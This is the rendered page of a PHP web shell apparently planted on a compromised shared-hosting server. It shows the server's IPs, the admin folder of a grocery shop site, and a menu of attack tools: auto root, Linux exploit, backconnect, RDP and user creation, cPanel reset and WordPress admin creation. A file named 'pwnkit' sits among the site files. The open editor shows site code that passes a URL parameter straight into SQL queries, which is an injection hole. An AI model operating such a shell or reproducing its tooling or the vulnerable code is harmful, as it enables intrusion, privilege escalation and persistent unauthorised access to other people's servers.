Linux server.hostify.co.in 5.14.0-611.49.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Apr 21 16:39:08 EDT 2026 x86_64
Apache
: 162.214.74.213 | : 216.73.217.79
438 Domain
8.2.31
orangegroceries
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
orangegroceries /
public_html /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assest
[ DIR ]
drwxr-xr-x
banner
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
aboutuscms.php
2.86
KB
-rw-r--r--
add-ads.php
7.15
KB
-rw-r--r--
add-brand.php
7.43
KB
-rw-r--r--
add-delivery-employee.php
17.68
KB
-rw-r--r--
add-employee.php
17.84
KB
-rw-r--r--
add-product.php
19.45
KB
-rw-r--r--
add-testimonial.php
4.18
KB
-rw-r--r--
admin.php
5.23
KB
-rw-r--r--
ajax_get_subcat.php
1.32
KB
-rw-r--r--
ajax_get_subsub_cat.php
1.31
KB
-rw-r--r--
all_product_delete.php
258
B
-rw-r--r--
assign-page.php
3.66
KB
-rw-r--r--
balance-sheet.php
6.43
KB
-rw-r--r--
banner.php
7.4
KB
-rw-r--r--
category.php
17.53
KB
-rw-r--r--
checkout-ads.php
3.7
KB
-rw-r--r--
checkout.php
23.41
KB
-rw-r--r--
customer-details.php
11.73
KB
-rw-r--r--
customer.php
4.2
KB
-rw-r--r--
dashboard.php
3.31
KB
-rw-r--r--
delete_ads.php
284
B
-rw-r--r--
delete_banner.php
282
B
-rw-r--r--
delete_brand.php
284
B
-rw-r--r--
delete_category.php
1.81
KB
-rw-r--r--
delete_customer.php
291
B
-rw-r--r--
delete_enquiry.php
288
B
-rw-r--r--
delete_ordprd.php
541
B
-rw-r--r--
delete_prd.php
292
B
-rw-r--r--
delete_product.php
1.49
KB
-rw-r--r--
delete_promo.php
290
B
-rw-r--r--
delete_subcategory.php
2.03
KB
-rw-r--r--
delete_subsubcategory.php
2.64
KB
-rw-r--r--
delete_testimonial.php
292
B
-rw-r--r--
department.php
3.71
KB
-rw-r--r--
designation.php
4.8
KB
-rw-r--r--
edit-assign-page.php
3.71
KB
-rw-r--r--
edit-product-details.php
24.8
KB
-rw-r--r--
edit_adstop.php
299
B
-rw-r--r--
edit_banner.php
300
B
-rw-r--r--
edit_brand.php
295
B
-rw-r--r--
edit_category.php
302
B
-rw-r--r--
edit_subcat.php
505
B
-rw-r--r--
edit_subsubcat.php
571
B
-rw-r--r--
enquiry-now.php
2.75
KB
-rw-r--r--
footer_content.php
2.89
KB
-rw-r--r--
get_prod_details.php
308
B
-rw-r--r--
home-ads.php
3.71
KB
-rw-r--r--
index.php
3.16
KB
-rw-r--r--
invoice.php
17.36
KB
-rw-r--r--
privacy.php
2.96
KB
-rw-r--r--
product-details.php
2.71
KB
-rw-r--r--
product-order-details.php
5.62
KB
-rw-r--r--
products.php
9.17
KB
-rw-r--r--
promo-code.php
5.64
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
return_policy.php
2.83
KB
-rw-r--r--
shipping_policy.php
2.87
KB
-rw-r--r--
status_update.php
337
B
-rw-r--r--
sub-category.php
20.11
KB
-rw-r--r--
sub-sub-category.php
24.04
KB
-rw-r--r--
term_condition.php
2.83
KB
-rw-r--r--
view-product-details.php
15.13
KB
-rw-r--r--
view-product-order-detail.php
11.2
KB
-rw-r--r--
view_pages.php
3.55
KB
-rw-r--r--
whatsapp-ads.php
3.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : delete_subsubcategory.php
<?php include("includes/db_config.php"); /*if(isset($_GET['id'])) { //var_dump($_GET);exit(); $id = $_GET['id']; $sql=" DELETE FROM sub_sub_category WHERE id={$_GET['id']}"; $res=mysqli_query($conn,$sql) or die(mysqli_error()); } echo "<script>window.location.href='sub-sub-category.php'</script>"; */ if(isset($_GET['id'])) { //var_dump($_GET);exit(); $id = $_GET['id']; $sql_sscats="select sub_sub_category.*,category.cat_name,sub_category.sub_category_name,sub_category.id as scat,sub_category.subcat_banner from sub_sub_category join category on sub_sub_category.category_id=category.id join sub_category on sub_sub_category.sub_category_id=sub_category.id where sub_sub_category.id='$id'"; $result_sscats = mysqli_query($conn, $sql_sscats); $res_sscats = mysqli_fetch_array($result_sscats); $name = strtolower(str_replace(" ", "-", $res_sscats['cat_name'])); $sub_name = strtolower(str_replace(" ", "-", $res_sscats['sub_category_name'])); $sub_sub_name = strtolower(str_replace(" ", "-", $res_sscats['sub_sub_cat_name'])); if(file_exists('../'.$name.'/'.$sub_name)) { $dir = "../$name/$sub_name/$sub_sub_name"; $dir = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS); $dir = new RecursiveIteratorIterator($dir,RecursiveIteratorIterator::CHILD_FIRST); foreach ( $dir as $file ) { $file->isDir() ? rmdir($file) : unlink($file); } $dir = "../$name/$sub_name/$sub_sub_name"; if(rmdir($dir)){ $sql=" DELETE FROM sub_sub_category WHERE id={$_GET['id']}"; if (mysqli_query($conn,$sql)) { echo " <script> alert('Your Sub Sub Category have successfully Deleted!!!'); location.replace('sub-sub-category.php'); </script>"; } else { echo " <script> alert('Something went wrong, please try again!!!'); location.replace('sub-sub-category.php'); </script>"; } } } else{ $sql=" DELETE FROM sub_sub_category WHERE id={$_GET['id']}"; if (mysqli_query($conn,$sql)) { echo " <script> alert('Your Sub Category have successfully Deleted!!!'); location.replace('sub-category.php'); </script>"; } else { echo " <script> alert('Something went wrong, please try again!!!'); location.replace('sub-category.php'); </script>"; } } } ?>
Close